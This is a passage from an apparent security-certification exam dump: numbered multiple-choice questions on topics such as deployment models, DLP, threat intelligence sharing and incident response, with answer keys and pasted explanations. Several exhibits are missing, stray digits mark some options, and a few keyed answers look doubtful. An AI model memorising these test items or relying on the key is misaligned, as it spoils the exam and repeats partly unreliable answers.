B. An attacker is utilizing a dictionary attack against the account.
C. An attacker is utilizing a brute-force attack against the account. 
D. An attacker is utilizing a rainbow table attack against the account.

Answer: C

END
QUESTION 493
A company would like to provide flexibility for employees on device preference. However, the company is concerned about supporting too many different types of hardware. Which of the following deployment models will provide the needed flexibility with the GREATEST amount of control and security over company data and infrastructure?

A. BYOD 
B. VDI 
C. COPE 
D. CYOD

Answer: D

END
QUESTION 494
During an asset inventory, several assets, supplies, and miscellaneous items were noted as missing. 
The security manager has been asked to find an automated solution to detect any future theft of equipment. 
Which of the following would be BEST to implement?

A. Badges 
B. Fencing
C. Access control vestibule 
D. Lighting
E. Cameras

Answer: E

END
QUESTION 495
Which of the following environments typically hosts the current version configurations and code, compares user-story responses and workflow, and uses a modified version of actual data for testing?

A. Development 
B. Staging
C. Production 
D. Test

Answer: B

END
QUESTION 496
During an incident response process involving a laptop, a host was identified as the entry point for malware.
The management team would like to have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?

A. dd
B. memdump 
C. tcpdump 
D. head

Answer: A

END
QUESTION 497
A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

A. Evil twin 
B. Jamming
C. DNS poisoning 
D. Bluesnarfing 
E. DDoS

Answer: A

END
QUESTION 498
A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it. Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the following should the company do to help to accomplish this goal?

A. Classify the data 
B. Mask the data
C. Assign the application owner 
D. Perform a risk analysis

Answer: A

END
QUESTION 499
A bad actor tries to persuade someone to provide financial information over the phone to gain access to funds. 
Which of the following types of attacks does this scenario describe?

A. Vishing 
B. Phishing
C. Spear phishing 
D. Whaling

Answer: A

END
QUESTION 500
A company was compromised, and a security analyst discovered the attacker was able to get access to a service account. The following logs were discovered during the investigation:






Which of the following MOST likely would have prevented the attacker from learning the service account name?

A. Race condition testing 
B. Proper error handling
C. Forward web server logs to a SIEM 
D. Input sanitization

Answer: B

END
QUESTION 501
Several employees have noticed other bystanders can clearly observe a terminal where passcodes are being entered. Which of the following can be eliminated with the use of a privacy screen?

A. Shoulder surfing 
B. Spear phishing
C. Impersonation attack 
D. Card cloning

Answer: A

END
QUESTION 502
Customers reported their antivirus software flagged one of the company's primary software products as suspicious. The company's Chief Information Security Officer has tasked the developer with determining a method to create a trust model between the software and the customer's antivirus software. Which of the following would be the BEST solution?

A. Code signing
B. Domain validation 
C. Extended validation 
D. Self-signing

Answer: A

END
QUESTION 503
Which of the following BEST helps to demonstrate integrity during a forensic investigation?

A. Event logs 
B. Encryption
C. Hashing 
D. Snapshots

Answer: C 

Digital evidence integrity is ensured by calculating MD5 and SHA1 hashes of the extracted content and storing it in a report along with other details related to the drive. It also offers an encryption feature to ensure the confidentiality of the digital evidence.

END
QUESTION 504
Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

A. Data breach notification 
B. Accountability
C. Legal hold
D. Chain of custody

Answer: C

END
QUESTION 505
Which of the following is a detective and deterrent control against physical intrusions?

A. A lock
B. An alarm 
C. A fence 
D. A sign

Answer: B 

Physical security is the protection of personnel, data, hardware, etc., from physical threats that could harm, damage, or disrupt business operations or impact the confidentiality, integrity, or availability of systems and/or data. Deterrent access control solutions are used to exact consequences in the event of noncompliance. Examples include security badges, mantraps, security cameras, trespass or intrusion alarms, auditing, and firewalls.

END
QUESTION 506
A systems analyst determines the source of a high number of connections to a web server that were initiated by ten different IP addresses that belong to a network block in a specific country. Which of the following techniques will the systems analyst MOST likely implement to address this issue?

A. Content filter 
B. SIEM
C. Firewall rules 
D. DLP

Answer: C

END
QUESTION 507
A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for 
further incident analysis. Which of the following tools will the other team member MOST likely use to open this file?

A. Autopsy 
B. Memdump
C. FTK imager 
D. Wireshark

Answer: D 

Some common applications that can open .pcap files are Wireshark, WinDump, tcpdump, Packet Square - Capedit and Ethereal.

The Sleuth Kit (sleuthkit.org) is an open-source collection of command line tools and programming libraries for disk imaging and file analysis. Autopsy is a graphical front-end for these tools and acts as a case management/workflow tool.

END
QUESTION 508
Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would BEST meet this need?

A. Community 
B. Private
C. Public 
D. Hybrid

Answer: A 

Community cloud storage is a variation of the private cloud storage model, which offers cloud solutions for specific businesses or communities. In this model, cloud storage providers offer their cloud architecture, software and other development tools to meet the requirements of the community. A community cloud in computing is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns (security, compliance, jurisdiction, etc.), whether managed internally or by a third-party and hosted internally or externally.

END
QUESTION 509
A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. 
Which of the following is the BEST solution to prevent this type of incident from occurring again?

A. Enforce the use of a controlled trusted source of container images.
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.
C. Define a vulnerability scan to assess container images before being introduced in the environment. 
D. Create a dedicated VPC for the containerized environment.

Answer: A

END
QUESTION 510
A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. 
As the devices are not enrolled to the domain and do not have policies applied to them, 
which of the following are best practices for authentication and infrastructure security? (Select TWO).

A. Create a new network for the mobile devices and block the communication to the internal network and servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers. 
F. Use a new and updated RADIUS server to maintain the best solution

Answer: BC

END
QUESTION 511
A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would BEST prevent email contents from being released should another breach occur?

A. Implement S/MIME to encrypt the emails at rest 
B. Enable full disk encryption on the mail servers.
C. Use digital certificates when accessing email via the web 
D. Configure web traffic to only use TLS-enabled channels

Answer: A

END
QUESTION 512
An organization wants to integrate its incident response processes into a workflow with automated decision points and actions based on predefined playbooks. Which of the following should the organization implement?

A. SIEM 
B. SOAR 
C. EDR 
D. CASB

Answer: B 

A trend in incident response is the use of Secure Orchestration, Automation, and Response (SOAR) tools to respond to low-level security events automatically. The key is that SOAR tools respond automatically, which frees up administrators to focus on other administrative and cybersecurity tasks. A SOAR platform is typically a combination of tools that can work together to detect and respond to suspicious activity.

END
QUESTION 513
As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

1A. TAXII 
B. DLP 
C. TTP 
D. STIX

Answer: A 

Threat Data Feeds
When you use a cyber threat intelligence (CTI) platform, you subscribe to a threat data feed. The information in the threat data can be combined with event data from your own network and system logs. An analysis platform performs correlation to detect
whether any IoCs are present. There are various ways that a threat data feed can be implemented.

Structured Threat Information eXpression (STIX)
The OASIS CTI framework (oasis-open.github.io/cti-documentation) is designed to provide a format for this type of automated feed so that organizations can share CTI.

 The Structured Threat Information eXpression (STIX) part of the framework describes standard terminology for IoCs and ways of indicating relationships between them.

Where STIX provides the syntax for describing CTI, the Trusted Automated eXchange of Indicator Information (TAXII) protocol provides a means for transmitting CTI data between servers and clients. For example, a CTI service provider would maintain a repository of CTI data. Subscribers to the service obtain updates to the data to load into analysis tools over TAXII. This data can be requested by the client (referred to as a collection), or the data can be pushed to subscribers (referred to as a channel).

TTPs Within Cyber Threat Intelligence
Tactics, techniques and procedures (TTPs) are the "patterns of activities or methods associated with a specific threat actor or group of threat actors." Analysis of TTPs aids in counterintelligence and security operations by describing how threat actors perform attacks.
Top threats facing an organization should be given priority for TTP maturation. Smaller organizations may benefit strategically by outsourcing research and response. One acronym everyone working on a cybersecurity team should be familiar with is TTPs (tactics, techniques and procedures) but not everyone understands how to use them properly within a cyber threat intelligence solution. TTPs describe how threat actors (the bad guys) orchestrate, execute and manage their operations attacks. ("Tactics" is also sometimes called "tools" in the acronym.) Specifically, TTPs are defined as the "patterns of activities or methods associated with a specific threat actor or group of threat actors," according to the Definitive Guide to Cyber Threat Intelligence.

END
QUESTION 514
A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the following is the BEST remediation strategy?

A. Update the base container image and redeploy the environment. 
B. Include the containers in the regular patching schedule for servers 
C. Patch each running container individually and test the application 
D. Update the host in which the containers are running

Answer: A 

A container image vulnerability is a security risk that is embedded inside a container image. While vulnerable images themselves don't pose an active threat, if containers are created based on a vulnerable image, the containers will introduce the vulnerability to a live environment.

END
QUESTION 515 
A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00am - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

A. A RAT
B. Ransomware 
C. Logic bomb 
D. A worm

Answer: A

A remote access Trojan (RAT) is a type of malware that allows attackers to take control of systems from remote locations. It is often delivered via drive-by downloads. Once installed on a system, attackers can then access the infected computer at any time, and install additional malware if desired. Some RATs automatically collect and log keystrokes, usernames and
passwords, incoming and outgoing email, chat sessions, and browser history as well as take screenshots. The RAT can then automatically send the data to the attackers at predetermined times.

END
QUESTION 516
The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate on incident response 
and to outsource outbound Internet URL categorization and filtering to an outside company. Additionally, the CISO would like 
this solution to provide the same protections even when a company laptop or mobile device is away from a home office. 
Which of the following should the CISO choose?

A. CASB
B. Next-generation SWG 
C. NGFW
D. Web-application firewall

Answer: B

A cloud access security broker (CASB) is on-premises or cloud based software that sits between cloud service users and cloud applications, and monitors all activity and enforces security policies.[1] A CASB can offer services such as monitoring user activity, warning administrators about potentially hazardous actions, enforcing security policy compliance, and automatically preventing malware.

Enterprise networks often make use of secure web gateways (SWG). An on-premises SWG is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. A next-generation
SWG, as marketed by Netskope (netskope.com/products/next-gen-swg), combines the functionality of an SWG with that of data loss prevention (DLP) and a CASB to provide a wholly cloud-hosted platform for client access to websites and cloud apps.
This supports an architecture defined by Gartner as secure access service edge (SASE) (scmagazine.com/home/opinion/secure-access-service-edge-sase-key-points-for-earlyadopters)

A Web-application firewall (WAF) protects your web apps by filtering, monitoring, and blocking any malicious HTTP/S traffic traveling to the web application, and prevents any unauthorized data from leaving the app. It does this by adhering to a set of policies that help determine what traffic is malicious and what traffic is safe.

END
QUESTION 517
A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. 
In order to restrict PHI documents, which of the following should be performed FIRST?

A. Retention 
B. Governance
C. Classification
D. Change management

Answer: C 

END
QUESTION 518
After a WiFi scan of a local office was conducted, an unknown wireless signal was identified. 
Upon investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using a single connection. Which of the following BEST describes the purpose of this device?

6A. loT sensor 
B. Evil twin
C. Rogue access point 
D. On-path attack

Answer: C

END
QUESTION 519
A recent security audit revealed that a popular website with IP address 172.16.1.5 also has an FTP service that employees were using to store sensitive corporate data. The organization's outbound firewall processes rules top-down. Which of the following would permit HTTP and HTTPS, while denying all other services for this host?

A. access-rule permit tcp destination 172.16.1.5 port 80 
	access-rule permit tcp destination 172.16.1.5 port 443 
	access-rule deny ip destination 172.16.1.5

B. access-rule permit tcp destination 172.16.1.5 port 22 
	access-rule permit tcp destination 172.16.1.5 port 443 
	access-rule deny tcp destination 172.16.1.5 port 80

C. access-rule permit tcp destination 172.16.1.5 port 21 
	access-rule permit tcp destination 172.16.1.5 port 80 
	access-rule deny ip destination 172.16.1.5

D. access-rule permit tcp destination 172.16.1.5 port 80 
	access-rule permit tcp destination 172.16.1.5 port 443 
	access-rule deny tcp destination 172.16.1.5 port 21

Answer: A

END
QUESTION 520
An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer 
B. Data owner
C. Backup administrator 
D. Data custodian
E. Internal auditor

Answer: D

END
QUESTION 521
A website developer who is concerned about theft of the company's user database wants to protect weak passwords from offline brute-force attacks. Which of the following be the BEST solution?

A. Lock accounts after five failed logons
B. Precompute passwords with rainbow tables 
C. Use a key-stretching technique
D. Hash passwords with the MD5 algorithm

Answer: C

END
QUESTION 522
A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when writing documents and the mouse pointer occasional disappears. The task list shows the following results.






Which of the following is MOST likely the issue?

A. RAT 
B. PUP
C. Spyware 
D. Keylogger

Answer: D

END
QUESTION 523
A Chief Executive Officer (CEO) is dissatisfied with the level of service from the company's new service provider. 
The service provider is preventing the CEO from sending email from a work account to a personal account. 
Which of the following types of service providers is being used?

A. Telecommunications service provider 
B. Cloud service provider
C. Master managed service provider 
D. Managed security service provider

Answer: D

The following list shows some of the services an MSSP may provide: 
> Patch management 
> Vulnerability scanning 
> Spam and virus filtering 
> Data loss prevention (DLP) 
> Virtual private network connections 
> Proxy services for web content filtering 

END
QUESTION 524
A company currently uses passwords for logging in to company-owned devices and wants to add a second authentication factor. Per corporate policy, users are not allowed to have smartphones at their desks. Which of the following would meet these requirements?

A. Smart card 
B. PIN code
C. Knowledge-based question 
D. Secret key

Answer: A

END
QUESTION 525
A dynamic application vulnerability scan identified code injection could be performed using a web form. 
Which of the following will be the BEST remediation to prevent this vulnerability?

A. Implement input validation 
B. Deploy MFA
C. Utilize a WAF 
D. Configure HIPS

Answer: A

END
QUESTION 526
Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP
B. MITRE ATT&CK 
C. Cyber Kill Chain 
D. SDLC

Answer: A

The Open Web Application Security Project (OWASP) is a not-for-profit, online community that publishes several secure application development resources, such as the Top 10 list of the most critical application security risks (owasp.org/www-projecttop-ten).

END
QUESTION 527
The board of directors at a company contracted with an insurance firm to limit the organization's liability. 
Which of the following risk management practices does this BEST describe?

A. Transference 
B. Avoidance 
C. Mitigation
D. Acknowledgement

Answer: A

END
QUESTION 528
Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?

A. Machine learning 
B. DNS sinkhole
C. Blocklist 
D. Honeypot

Answer: C

END
QUESTION 529
An analyst just discovered an ongoing attack on a host that is on the network. 
The analyst observes the below taking place:

- The computer performance is slow
- Ads are appearing from various pop-up windows 
- Operating system files are modified
- The computer is receiving AV alerts for execution of malicious processes

Which of the following steps should the analyst consider FIRST?

A. Check to make sure the DLP solution is in the active state 
B. Patch the host to prevent exploitation
C. Put the machine in containment
D. Update the AV solution on the host to stop the attack

Answer: C

END
QUESTION 530
Security analysts are conducting an investigation of an attack that occurred inside the organization's network. 
An attacker was able to connect network traffic between workstations throughout the network. 
The analysts review the following logs:










The layer 2 address table has hundreds of entries similar to the ones above. 
Which of the following attacks has MOST likely occurred?

A. SQL injection 
B. DNS spoofing 
C. MAC flooding 
D. ARP poisoning

Answer: C

END
QUESTION 531
The chief compliance officer from a bank has approved a background check policy for all new hires. 
Which of the following is the policy MOST likely protecting against?

A. Preventing any current employees' siblings from working at the bank to prevent nepotism.
B. Hiring an employee who has been convicted of theft to adhere to industry compliance.
C. Filtering applicants who have added false information to resumes so they appear better qualified.
D. Ensuring no new hires have worked at other banks that may be trying to steal customer information.

Answer: B

END
QUESTION 532
Which biometric error would allow an unauthorized user to access a system?

A. False acceptance 
B. False entrance 
C. False rejection
D. False denial

Answer: A

END
QUESTION 533
Which of the following would produce the closest experience of responding to an actual incident response scenario?

A. Lessons learned 
B. Simulation
C. Walk-through 
D. Tabletop

Answer: B

END
QUESTION 534
An organization is concerned about intellectual property theft by employees who leave the organization. 
Which of the following will the organization MOST likely implement?

A. CBT 
B. NDA 
C. MOU 
D. AUP

Answer: B

END
QUESTION 535
An organization maintains several environments in which patches are developed and tested before deployed to an operation status. Which of the following is the environment in which patches will be deployed just prior to being put into an operational status?

A. Development
3B. Test
C. Production 
D. Staging

Answer: D

END
QUESTION 536
Which of the following control types would be BEST to use to identify violations and incidents?

A. Detective
B. Compensating 
C. Deterrent
D. Corrective 
E. Recovery 
F. Preventive

Answer: A

END
QUESTION 537
A security manager runs Nessus scans of the network after every maintenance window. 
Which of the following is the security manger MOST likely trying to accomplish?

A. Verifying that system patching has effectively removed known vulnerabilities.
B. Identifying assets on the network that may not exist on the network asset inventory. 
C. Validating the hosts do not have vulnerable ports exposed to the internet.
D. Checking the status of the automated malware analysis that is being performed.

Answer: A

END
QUESTION 538
A penetration tester gains access to the network by exploiting a vulnerability on a public-facing web server. 
Which of the following techniques will the tester most likely perform NEXT?

A. Gather more information about the target through passive reconnaissance. 
B. Establish rules of engagement before proceeding
C. Create a user account to maintain persistence
D. Move laterally throughout the network to search for sensitive information

Answer: C

END
QUESTION 539
A news article states that a popular web browser deployed on all corporate PCs is vulnerable to a zero-day attack. Which of the following MOST concerns the Chief Information Security Officer about the information in the news article?

A. Insider threats have compromised this network
B. Web browsing is not functional for the entire network
C. Antivirus signatures are required to be updated immediately 
D. No patches are available for the web browser

Answer: D

END
QUESTION 540
DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud environment respond to load fluctuation in a cost-effective way. 
Which of the following options BEST fulfils the architect's requirements?

A. An orchestration solution that can adjust scalability of cloud assets. 
B. Use of multipath by adding more connections to cloud storage.
C. Cloud assets replicated on geographically distributed regions.
D. An on-site backup that is deployed and only used when the load increases.

Answer: A


END
QUESTION 541
Administrators have allowed employees to access their company email from personal computers. However, the administrators are concerned that these computers are another attack surface and can result in user accounts being breached by foreign actors. Which of the following actions would provide the MOST secure solution?

A. Enable an option in the administration center so accounts can be locked if they are accessed from different geographical areas.
B. Implement a 16-character minimum length and 30-day expiration password policy.
C. Set up a global mail rule to disallow the forwarding of any company email to email addresses outside the organization.
D. Enforce a policy that allows employees to be able to access their email only while they are connected to the internet via VPN.

Answer: D

END
QUESTION 542
A security engineer needs to build a solution to satisfy regulatory requirements that state certain critical servers must be accessed using MFA. However, the critical servers are older and are unable to support the addition of MFA.
Which of the following will the engineer MOST likely use to achieve this objective?

A. A forward proxy 		
B. A stateful firewall 
C. A jump server
D. A port tap

Answer: C

A stateful firewall inspects traffic and makes decisions based on the traffic context or state. It keeps track of established sessions, inspects traffic based on its state within a session, and it blocks traffic that isn’t part of an established session. As an example, a TCP session starts with a three-way handshake. If a stateful firewall detects TCP traffic without a corresponding three-way handshake, it recognizes this as suspicious traffic and can block it.

A port tap or port mirror on the internal switch. Most switches support port mirroring (sometimes called port spanning), allowing administrators to configure the switch to send all traffic the switch receives to a single port. After configuring a port mirror, you can use it as a tap to send all switch data to a sensor or collector and forward this to a NIDS console. Similarly, it’s possible to configure port taps on routers to capture all traffic sent through the router and send it to the IDS.

One of the challenges of managing hosts that are exposed to the Internet, such as in a DMZ or cloud virtual network, is to provide administrative access to the servers and appliances located within it. On the one hand, a link is necessary; on the other, the
administrative interface could be compromised and exploited as a pivot point into the rest of the network. Consequently, the management hosts permitted to access administrative interfaces on hosts in the secure zone must be tightly controlled.
Configuring and auditing this type of control when there are many different servers
operating in the zone is complex. One solution to this complexity is to add a single administration server, or jump server, 
to the secure zone. The jump server only runs the necessary administrative port and protocol (typically SSH or RDP). Administrators connect to the jump server then use the jump server to connect to the admin interface on the application server.
The application server's admin interface has a single entry in its ACL (the jump server) and denies connection attempts from any other hosts.

END
QUESTION 543
A security analyst wants to fingerprint a web server. 
Which of the following tools will the security analyst MOST likely use to accomplish this task?

A. nmap -p1-65535 192.168.0.10 
B. dig 192.168.0.10
  C. curl --head http://192.168.0.10 
D. ping 192.168.0.10

Answer: A 

 
 

END
QUESTION 544
Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

A. GDPR 
B. PCI DSS
C. ISO 27000 
D. NIST 800-53

Answer: D 

NIST Special Publication 800-53 provides a catalog of security and privacy controls for all U.S. federal information systems except those related to national security. It is published by the National Institute of Standards and Technology, which is a non-regulatory agency of the United States Department of Commerce.

END
QUESTION 545
An information security policy states that separation of duties is required for all highly sensitive database changes that involve customers' financial data. Which of the following will this BEST prevent?

A. Least privilege 
B. An insider threat 
C. A data breach
D. A change control violation

Answer: B

Separation of duties - is a means of establishing checks and balances against the possibility that critical system or procedures can be compromised by insider threats. Duties and responsibilities should be divided among individuals to prevent ethical conflicts or abuse of powers.

END
QUESTION 546
A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the analyst to block the originating source. Several days later another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?

A. True positive 
B. True negative 
C. False positive 
D. False negative

Answer: C 

Traditional SIEM Log Analysis
Traditionally, the SIEM used two techniques to generate alerts from log data: correlation rules, specifying a sequence of events that indicates an anomaly, which could represent a security threat, vulnerability or active security incident; and vulnerabilities and risk assessment, which involves scanning networks for known attack patterns and vulnerabilities. The drawback of these older techniques is that they generate a lot of false positives, and are not successful at detecting new and unexpected event types

END
QUESTION 547
Hackers recently attacked a company's network and obtained several unfavorable pictures from the Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a ransom is not paid. 
Which of the following is impacted the MOST?

A. Identify theft 
B. Data loss
C. Data exfiltration 
D. Reputation

Answer: D

Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft.

END
QUESTION 548
A software company is analyzing a process that detects software vulnerabilities at the earliest stage possible. 
The goal is to scan the source looking for unsecure practices and weaknesses before the application is deployed in a runtime environment. Which of the following would BEST assist the company with this objective?

A. Use fuzzing testing
B. Use a web vulnerability scanner 
C. Use static code analysis
D. Use a penetration-testing OS

Answer: C 

Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks.


Static program analysis is the analysis of computer software performed without executing any programs, in contrast with dynamic analysis, which is performed on programs during their execution.
What is static code analysis?

Static code analysis is a method of debugging by examining source code before a program is run. It's done by analyzing a set of code against a set (or multiple sets) of coding rules. ... This type of analysis addresses weaknesses in source code that might lead to vulnerabilities.

A penetration test, colloquially known as a pen test or ethical hacking, is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system; this is not to be confused with a vulnerability assessment.

END
QUESTION 549
A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources. Which of the following risks would this training help to prevent?

A. Hoaxes 
B. SPIMs
C. Identity fraud
D. Credential harvesting

Answer: A

A hoax is a falsehood deliberately fabricated to masquerade as the truth. It is distinguishable from errors in observation or judgment, rumors, urban legends, pseudo sciences, and April Fools' Day events that are passed along in good faith by believers or as jokes.
Identity theft occurs when someone uses another person's personal identifying information, like their name, identifying number, or credit card number, without their permission, to commit fraud or other crimes. The term identity theft was coined in 1964. Identity fraud (also known as identity theft or crime) involves someone using another individual's personal information without consent, often to obtain a benefit.

Credential Harvesting (or Account Harvesting) is the use of MITM attacks, DNS poisoning, phishing, and other vectors to amass large numbers of credentials (username / password combinations) for reuse.


END
QUESTION 550
A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement. Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?

A. Autopsy 
B. Cuckoo
C. Memdump 
D. Nmap

Answer: D 

Memdump
A display or printout of all or selected contents of RAM. After a program abends (crashes), a memory dump is taken in order to analyze the status of the program. The programmer looks into the memory buffers to see which data items were being worked on at the time of failure.

Nmap
Nmap is a network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection.

Cuckoo Sandbox is an open-source automated software analysis system. Its primary purpose is to analyze suspicious files, such as suspected malware. Unlike malware that analyzes files in real-time, you need to submit files to Cuckoo Sandbox. Cuckoo then runs it in a virtual machine (VM) and creates a report on its activity.

END
QUESTION 551
A security analyst is responding to an alert from the SIEM. The alert states that malware was discovered on a host and was not automatically deleted. Which of the following would be BEST for the analyst to perform?

A. Add a deny-all rule to that host in the network ACL
B. Implement a network-wide scan for other instances of the malware. 
C. Quarantine the host from other parts of the network
D. Revoke the client's network access certificates

Answer: C 

END
QUESTION 552
Which of the following authentication methods sends out a unique password to be used within a specific number of seconds?

A. TOTP
B. Biometrics 
C. Kerberos 
D. LDAP

Answer: A

END
QUESTION 553
Which of the following must be in place before implementing a BCP?

A. SLA 
B. AUP 
C. NDA 
D. BIA

Answer: D 

To create an effective business continuity plan, a firm should take these five steps: 
Step 1: Risk Assessment
This phase includes:
Evaluation of the company's risks and exposures
Assessment of the potential impact of various business disruption scenarios.
Determination of the most likely threat scenarios.
Assessment of telecommunication recovery options and communication plans. 
Prioritization of findings and development of a roadmap.

Step 2: Business Impact Analysis (BIA)
During this phase we collect information on:
Recovery assumptions, including Recovery Point Objectives (RPO) and Recovery Time Objectives (RTO)
Critical business processes and workflows as well as the supporting production applications Interdependencies, both internal and external
Critical staff including backups, skill sets, primary and secondary contacts Future endeavors that may impact recovery
Special circumstances
Pro tip: Compiling your BIA into a master list can be helpful from a wholistic standpoint, as well as helpful in identifying pain points throughout the organization.

Step 3: Business Continuity Plan Development 
This phase includes:
Obtaining executive sign-off of Business Impact Analysis Synthesizing the Risk Assessment and BIA findings to create an actionable and thorough plan
Developing department, division and site level plans
Reviewing plan with key stakeholders to finalize and distribute 

Step 4: Strategy and Plan Development
Validate that the recovery times that you have stated in your plan are obtainable and meet the objectives that are stated in the BIA. They should easily be available and readily accessible to staff, especially if and when a disaster were to happen. In the development phase, it's important to incorporate many perspectives from various staff and all departments to help map the overall company feel and organizational focus. Once the plan is developed, we recommend that you have an executive or management team review and sign off on the overall plan.

Step 5: Plan Testing & Maintenance
The final critical element of a business continuity plan is to ensure that it is tested and maintained on a regular basis. This includes:
Conducting periodic table top and simulation exercises to ensure key stakeholders are comfortable with the plan steps
Executing bi-annual plan reviews
Performing annual Business Impact Assessments

END
QUESTION 554
A system that requires an operation availability of 99.99% and has an annual maintenance
window available to patching and fixes will require the HIGHEST:

A. MTBF 
B. MTTR 
C. RPO 
D. RTO

Answer: A

END
QUESTION 555
A company reduced the area utilized in its datacenter by creating virtual networking through automation and by creating provisioning routes and rules through scripting. Which of the following does this example describe?

A. laC
B. MSSP
C. Containers 
D. SaaS

Answer: A 

Infrastructure as code is the process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools.

END
QUESTION 556
As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous incident is happening again. Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?

A. Creating a playbook within the SOAR 
B. Implementing rules in the NGFW
C. Updating the DLP hash database
D. Publishing a new CRL with revoked certificates

Answer: A

A trend in incident response is the use of Secure Orchestration, Automation, and Response (SOAR) tools to respond to low-level security events automatically. The key is that SOAR tools respond automatically, which frees up administrators to focus on other administrative and cybersecurity tasks. A SOAR platform is typically a combination of tools that can work together to detect and respond to suspicious activity.

END
QUESTION 557
A systems administrator is considering different backup solutions for the IT infrastructure. The company is looking for a solution that offers the fastest recovery time while also saving the most amount of storage used to maintain the backups. Which of the following recovery solutions would be the BEST option to meet these requirements?

A. Snapshot 
B. Differential 
C. Full
D. Tape

Answer: B 

END
QUESTION 558
An organization wants seamless authentication to its applications. 
Which of the following should the organization employ to meet this requirement?

A. SOAP 
B. SAML 
C. SSO
D. Kerberos

Answer: C




END
QUESTION 559
A penetration tester successfully gained access to a company's network. The investigating analyst determines malicious traffic connected through the WAP despite filtering rules being in place. Logging in to the connected switch, the analyst sees the following in the ARP table:
Which of the following did the penetration tester MOST likely use?

A. ARP poisoning 
B. MAC cloning
C. Man in the middle 
D. Evil twin

Answer: B

Address Resolution Protocol (ARP) - Resolves Good IP to Good MAC Address
ARP Poisoning - Good IP to Bad MAC Address (Redirection on local subnet only)
MAC Cloning - Bad IP to Good MAC

END
QUESTION 560
A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update the application for compatibility with more secure libraries. 
Which of the following would be the MOST prudent course of action?

A. Accept the risk if there is a clear road map for timely decommission. 
B. Deny the risk due to the end-of-life status of the application.
C. Use containerization to segment the application from other applications to eliminate the risk.
1D. Outsource the application to a third-party developer group.

Answer: A

END
QUESTION 561
A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP (Enterprise Resource Planning) system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. 
Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis 
B. CIS Critical Security Controls
C. NIST Risk Management Framework 
D. ISO 27002

Answer: C 

NIST SP 800-37, “Risk Management Framework for Information Systems and Organizations,” covers the Risk Management
Framework (RMF). While U.S. federal government agencies must adopt the RMF, many private sector organizations adopt it as well. RMF provides organizations with a seven-step process to identify and mitigate risks. The seven steps are: 

> Prepare
> Categorize 
> Select security controls
> Implement security controls
> Assess security controls. 
> Authorize information systems
> Monitor security controls

ISO/IEC 27002 - Security techniques - Code of practice for information security controls.


The Diamond Model of Intrusion Analysis focuses on understanding the attacker by analyzing four key components of every intrusion event. These four components are: 

Adversary. Adversaries can be identified by email addresses, handles used in online forums,  memberships in advanced persistent threat groups, and other identifiers. 

Capabilities. Capabilities refer to the malware, exploits, and other hacker tools used in the intrusion.  

Infrastructure. The infrastructure refers to the Internet domain names, email addresses, and IP addresses used by the adversary.  

